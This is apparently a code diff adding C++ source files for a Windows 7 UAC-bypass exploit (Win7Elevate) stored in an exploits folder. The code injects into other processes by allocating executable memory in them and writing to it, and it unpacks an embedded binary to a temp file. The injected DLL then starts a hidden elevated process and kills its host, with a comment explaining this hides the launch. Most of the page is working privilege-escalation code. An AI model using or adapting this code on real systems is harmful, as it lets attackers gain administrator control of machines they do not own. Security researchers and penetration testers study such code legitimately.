strMsg += L" (pid: ";
|
||||
strMsg += szPID;
|
||||
strMsg += L") ";
|
||||
|
||||
if (dwError == ERROR_ACCESS_DENIED)
|
||||
{
|
||||
strMsg += L"ERROR_ACCESS_DENIED\n(We probably tried to inject into an elevated process\nwhich isn't allowed unless we're also elevated.\nPick an unelevated process.)";
|
||||
}
|
||||
else
|
||||
{
|
||||
strMsg += L"error ";
|
||||
strMsg += szError;
|
||||
}
|
||||
|
||||
//MessageBox(hWnd, strMsg.c_str(), L"Win7Elevate", MB_OK | MB_ICONWARNING);
|
||||
CLogger::LogLine(strMsg);
|
||||
|
||||
return false;
|
||||
}
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
W7EUtils::CTempResource::CTempResource(HINSTANCE hInstance, int iResourceId)
|
||||
: m_hInstance(hInstance)
|
||||
, m_iResourceId(iResourceId)
|
||||
{
|
||||
}
|
||||
|
||||
// virtual
|
||||
W7EUtils::CTempResource::~CTempResource()
|
||||
{
|
||||
if (!m_strFilePath.empty())
|
||||
{
|
||||
DeleteFile(m_strFilePath.c_str());
|
||||
m_strFilePath.clear();
|
||||
}
|
||||
m_iResourceId = 0;
|
||||
}
|
||||
|
||||
bool W7EUtils::CTempResource::GetFilePath(std::wstring &strPath)
|
||||
{
|
||||
if (m_strFilePath.empty())
|
||||
{
|
||||
wchar_t szTempPath[MAX_PATH];
|
||||
|
||||
DWORD dwTemp = GetTempPath(_countof(szTempPath), szTempPath);
|
||||
|
||||
if (dwTemp != 0 && dwTemp < _countof(szTempPath))
|
||||
{
|
||||
HRSRC hResource = FindResource(m_hInstance, MAKEINTRESOURCE(m_iResourceId), L"BINARY");
|
||||
|
||||
if (hResource)
|
||||
{
|
||||
HGLOBAL hLoadedResource = LoadResource(m_hInstance, hResource);
|
||||
|
||||
if (hLoadedResource)
|
||||
{
|
||||
LPVOID pLockedResource = LockResource(hLoadedResource);
|
||||
|
||||
if (pLockedResource)
|
||||
{
|
||||
DWORD dwResourceSize = SizeofResource(m_hInstance, hResource);
|
||||
|
||||
if (0 != dwResourceSize)
|
||||
{
|
||||
wchar_t szTempFilePath[MAX_PATH];
|
||||
|
||||
if (0 != GetTempFileName(szTempPath, L"w7e", 0, szTempFilePath))
|
||||
{
|
||||
HANDLE hFile = CreateFile(szTempFilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
|
||||
if (INVALID_HANDLE_VALUE != hFile)
|
||||
{
|
||||
DWORD dwBytesWritten = 0;
|
||||
|
||||
if (WriteFile(hFile, pLockedResource, dwResourceSize, &dwBytesWritten, NULL)
|
||||
&& dwBytesWritten == dwResourceSize)
|
||||
{
|
||||
m_strFilePath = szTempFilePath;
|
||||
}
|
||||
|
||||
CloseHandle(hFile);
|
||||
|
||||
if (m_strFilePath.empty())
|
||||
{
|
||||
DeleteFile(szTempFilePath);
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
if (!m_strFilePath.empty())
|
||||
{
|
||||
strPath = m_strFilePath;
|
||||
return true;
|
||||
}
|
||||
|
||||
strPath.clear();
|
||||
return false;
|
||||
}
|
||||
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
W7EUtils::CRemoteMemory::CRemoteMemory(HANDLE hRemoteProcess)
|
||||
: m_hRemoteProcess(hRemoteProcess)
|
||||
, m_bAnyFailures(false)
|
||||
{
|
||||
}
|
||||
|
||||
// virtual
|
||||
W7EUtils::CRemoteMemory::~CRemoteMemory()
|
||||
{
|
||||
while(!m_listRemoteAllocations.empty())
|
||||
{
|
||||
VirtualFreeEx(m_hRemoteProcess, m_listRemoteAllocations.back(), 0, MEM_RELEASE);
|
||||
m_listRemoteAllocations.pop_back();
|
||||
}
|
||||
}
|
||||
|
||||
void W7EUtils::CRemoteMemory::LeakMemory()
|
||||
{
|
||||
m_listRemoteAllocations.clear();
|
||||
}
|
||||
|
||||
bool W7EUtils::CRemoteMemory::AnyFailures() const
|
||||
{
|
||||
return m_bAnyFailures;
|
||||
}
|
||||
|
||||
void *W7EUtils::CRemoteMemory::AllocAndCopyMemory(const void *pLocalBuffer, SIZE_T bufferSize, bool bExecutable, bool bConst)
|
||||
{
|
||||
void *pRemoteAllocation = VirtualAllocEx(m_hRemoteProcess, 0, bufferSize, MEM_COMMIT | PAGE_READWRITE, bExecutable ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE);
|
||||
|
||||
if (pRemoteAllocation)
|
||||
{
|
||||
DWORD dwOldProtect = 0;
|
||||
|
||||
if (!WriteProcessMemory(m_hRemoteProcess, pRemoteAllocation, pLocalBuffer, bufferSize, NULL)
|
||||
|| (!bExecutable && !bConst && !VirtualProtectEx(m_hRemoteProcess, pRemoteAllocation, bufferSize, bExecutable ? PAGE_EXECUTE_READ : PAGE_READONLY, &dwOldProtect)))
|
||||
{
|
||||
VirtualFreeEx(m_hRemoteProcess, pRemoteAllocation, 0, MEM_RELEASE);
|
||||
pRemoteAllocation = 0;
|
||||
}
|
||||
else
|
||||
{
|
||||
m_listRemoteAllocations.push_back(pRemoteAllocation);
|
||||
}
|
||||
}
|
||||
|
||||
if (pRemoteAllocation == 0)
|
||||
{
|
||||
m_bAnyFailures = true;
|
||||
}
|
||||
|
||||
return pRemoteAllocation;
|
||||
}
|
||||
|
||||
wchar_t *W7EUtils::CRemoteMemory::AllocAndCopyMemory(const wchar_t *szLocalString, bool bConst)
|
||||
{
|
||||
return reinterpret_cast< wchar_t * >(
|
||||
this->AllocAndCopyMemory(
|
||||
reinterpret_cast< const void * >( szLocalString ),
|
||||
(wcslen(szLocalString)+1) * sizeof(szLocalString[0]),
|
||||
false, bConst ) );
|
||||
}
|
||||
|
||||
char *W7EUtils::CRemoteMemory::AllocAndCopyMemory(const char *szLocalString, bool bConst)
|
||||
{
|
||||
return reinterpret_cast< char * >(
|
||||
this->AllocAndCopyMemory(
|
||||
reinterpret_cast< const void * >( szLocalString ),
|
||||
(strlen(szLocalString)+1) * sizeof(szLocalString[0]),
|
||||
false, bConst ) );
|
||||
}
|
||||
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
|
||||
// GetElevationType slightly modified from original by Andrei Belogortseff
|
||||
// From http://stackoverflow.com/questions/95912/how-can-i-detect-if-my-process-is-running-uac-elevated-or-not
|
||||
bool W7EUtils::GetElevationType(TOKEN_ELEVATION_TYPE * ptet)
|
||||
{
|
||||
bool bResult = false;
|
||||
|
||||
HANDLE hToken = NULL;
|
||||
|
||||
if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
|
||||
{
|
||||
DWORD dwReturnLength = 0;
|
||||
|
||||
if (GetTokenInformation(hToken, TokenElevationType, ptet, sizeof(*ptet), &dwReturnLength ))
|
||||
{
|
||||
assert(dwReturnLength == sizeof(*ptet));
|
||||
bResult = true;
|
||||
}
|
||||
|
||||
CloseHandle(hToken);
|
||||
}
|
||||
|
||||
return bResult;
|
||||
}
|
||||
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
|
@ -0,0 +1,54 @@
|
|||
#pragma once
|
||||
|
||||
namespace W7EUtils
|
||||
{
|
||||
bool GetProcessList(HWND hWnd, std::map< DWORD, std::wstring > &mapProcs);
|
||||
|
||||
bool OpenProcessToInject(HWND hWnd, HANDLE *pOutProcHandle, DWORD dwPid, const wchar_t *szProcName);
|
||||
|
||||
bool GetElevationType(TOKEN_ELEVATION_TYPE * ptet);
|
||||
|
||||
template < typename T > class GetProcAddr
|
||||
{
|
||||
public:
|
||||
T f;
|
||||
|
||||
__forceinline GetProcAddr(FARPROC (WINAPI *fpGetProcAddress)(HMODULE hModule, LPCSTR lpProcName), HMODULE hModule, const char *lpProcName)
|
||||
{
|
||||
f = reinterpret_cast< T >(fpGetProcAddress(hModule, lpProcName));
|
||||
}
|
||||
};
|
||||
|
||||
class CTempResource
|
||||
{
|
||||
private:
|
||||
HINSTANCE m_hInstance;
|
||||
int m_iResourceId;
|
||||
std::wstring m_strFilePath;
|
||||
public:
|
||||
CTempResource(HINSTANCE hInstance, int iResourceId);
|
||||
virtual ~CTempResource();
|
||||
bool GetFilePath(std::wstring &strPath);
|
||||
};
|
||||
|
||||
class CRemoteMemory
|
||||
{
|
||||
private:
|
||||
HANDLE m_hRemoteProcess;
|
||||
std::list< void * > m_listRemoteAllocations;
|
||||
bool m_bAnyFailures;
|
||||
|
||||
private:
|
||||
CRemoteMemory(const CRemoteMemory &rhs); // Disallow.
|
||||
CRemoteMemory &operator=(const CRemoteMemory &rhs); // Disallow.
|
||||
|
||||
public:
|
||||
CRemoteMemory(HANDLE hRemoteProcess);
|
||||
virtual ~CRemoteMemory();
|
||||
void LeakMemory();
|
||||
bool AnyFailures() const;
|
||||
void *AllocAndCopyMemory(const void *pLocalBuffer, SIZE_T bufferSize, bool bExecutable, bool bConst = true);
|
||||
wchar_t *AllocAndCopyMemory(const wchar_t *szLocalString, bool bConst = true);
|
||||
char *AllocAndCopyMemory(const char *szLocalString, bool bConst = true);
|
||||
};
|
||||
}
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// Win7Elevate.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,44 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
|
||||
#if defined _M_IX86
|
||||
|
||||
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\"")
|
||||
|
||||
#elif defined _M_X64
|
||||
|
||||
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='amd64' publicKeyToken='6595b64144ccf1df' language='*'\"")
|
||||
|
||||
#endif
|
||||
|
||||
|
||||
|
||||
#include <windows.h>
|
||||
|
||||
#include <commctrl.h>
|
||||
#include <shlobj.h>
|
||||
|
||||
#include <Tlhelp32.h>
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <tchar.h>
|
||||
#include <assert.h>
|
||||
|
||||
#include <string>
|
||||
#include <list>
|
||||
#include <map>
|
||||
|
||||
#ifndef FOFX_REQUIREELEVATION
|
||||
#define FOFX_REQUIREELEVATION (0x10000000)
|
||||
#endif
|
||||
|
||||
#ifndef FOFX_DONTDISPLAYLOCATIONS
|
||||
#define FOFX_DONTDISPLAYLOCATIONS (0x80000000)
|
||||
#endif
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
|
@ -0,0 +1,6 @@
|
|||
// Win7ElevateDll.cpp : Defines the exported functions for the DLL application.
|
||||
//
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
|
|
@ -0,0 +1,179 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<ProjectGuid>{A1814C92-4DA6-440C-811E-86016AB7433A}</ProjectGuid>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<RootNamespace>Win7ElevateDll</RootNamespace>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)32</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
||||
<TargetName>$(ProjectName)64</TargetName>
|
||||
<GenerateManifest>false</GenerateManifest>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<Optimization>Disabled</Optimization>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<PrecompiledHeader>Use</PrecompiledHeader>
|
||||
<Optimization>MinSpace</Optimization>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Windows</SubSystem>
|
||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
</Link>
|
||||
<BuildLog>
|
||||
<Path>
|
||||
</Path>
|
||||
</BuildLog>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h" />
|
||||
<ClInclude Include="targetver.h" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="..\CMMN.cpp" />
|
||||
<ClCompile Include="dllmain.cpp">
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
</PrecompiledHeader>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
|
||||
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
|
||||
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
36
external/source/exploits/bypassuac/Win7ElevateDll/Win7ElevateDll.vcxproj.filters
vendored
Normal file
36
external/source/exploits/bypassuac/Win7ElevateDll/Win7ElevateDll.vcxproj.filters
vendored
Normal file
|
@ -0,0 +1,36 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Resource Files">
|
||||
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="stdafx.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="targetver.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="stdafx.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="dllmain.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="..\CMMN.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
</Project>
|
3
external/source/exploits/bypassuac/Win7ElevateDll/Win7ElevateDll.vcxproj.user
vendored
Normal file
3
external/source/exploits/bypassuac/Win7ElevateDll/Win7ElevateDll.vcxproj.user
vendored
Normal file
|
@ -0,0 +1,3 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
</Project>
|
|
@ -0,0 +1,57 @@
|
|||
#include "stdafx.h"
|
||||
|
||||
#include <stdio.h>
|
||||
|
||||
#include ".\..\CMMN.h"
|
||||
|
||||
#include <stdlib.h>
|
||||
#include <string>
|
||||
|
||||
BOOL APIENTRY DllMain( HMODULE hModule,
|
||||
DWORD ul_reason_for_call,
|
||||
LPVOID lpReserved
|
||||
)
|
||||
{
|
||||
//
|
||||
// Simple stub code that is used to create EXE within a alevated process.
|
||||
// Wee need to hide fact that we've started process thats why we immediately
|
||||
// Terminate host application.
|
||||
//
|
||||
CLogger::LogLine(TEXT("DLL: Hello"));
|
||||
|
||||
switch (ul_reason_for_call)
|
||||
{
|
||||
case DLL_PROCESS_ATTACH:
|
||||
{
|
||||
//
|
||||
// Obtaining TIOR path to be used for CreateProcess call
|
||||
//
|
||||
std::wstring cmd;
|
||||
CInterprocessStorage::GetString( TEXT("w7e_TIORPath"), cmd );
|
||||
|
||||
STARTUPINFO startupInfo = {0};
|
||||
startupInfo.cb = sizeof(startupInfo);
|
||||
PROCESS_INFORMATION processInfo = {0};
|
||||
|
||||
CLogger::LogLine(TEXT("DLL: TIOR shell="));
|
||||
CLogger::LogLine(cmd);
|
||||
|
||||
//
|
||||
// Create not visible window
|
||||
//
|
||||
if (CreateProcess(cmd.c_str(), NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW * 1, NULL, NULL, &startupInfo, &processInfo))
|
||||
{
|
||||
CloseHandle(processInfo.hProcess);
|
||||
CloseHandle(processInfo.hThread);
|
||||
}
|
||||
|
||||
ExitProcess(-69);
|
||||
}
|
||||
break;
|
||||
case DLL_THREAD_ATTACH:
|
||||
case DLL_THREAD_DETACH:
|
||||
case DLL_PROCESS_DETACH:
|
||||
break;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
|
@ -0,0 +1,8 @@
|
|||
// stdafx.cpp : source file that includes just the standard includes
|
||||
// Win7ElevateDll.pch will be the pre-compiled header
|
||||
// stdafx.obj will contain the pre-compiled type information
|
||||
|
||||
#include "stdafx.h"
|
||||
|
||||
// TODO: reference any additional headers you need in STDAFX.H
|
||||
// and not in this file
|
|
@ -0,0 +1,17 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
|
||||
// Windows Header Files:
|
||||
#include <windows.h>
|
||||
|
||||
|
||||
|
||||
// TODO: reference additional headers your program requires here
|
||||
#include <assert.h>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
|
@ -0,0 +1,17 @@
|
|||
// stdafx.h : include file for standard system include files,
|
||||
// or project specific include files that are used frequently, but
|
||||
// are changed infrequently
|
||||
//
|
||||
|
||||
#pragma once
|
||||
|
||||
#include "targetver.h"
|
||||
|
||||
#define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
|
||||
// Windows Header Files:
|
||||
#include <windows.h>
|
||||
|
||||
|
||||
|
||||
// TODO: reference additional headers your program requires here
|
||||
#include <assert.h>
|
|
@ -0,0 +1,8 @@
|
|||
#pragma once
|
||||
|
||||
// Including SDKDDKVer.h defines the highest available Windows platform.
|
||||
|
||||
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
|
||||
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
|
||||
|
||||
#include <SDKDDKVer.h>
|
Loading…
Reference in New Issue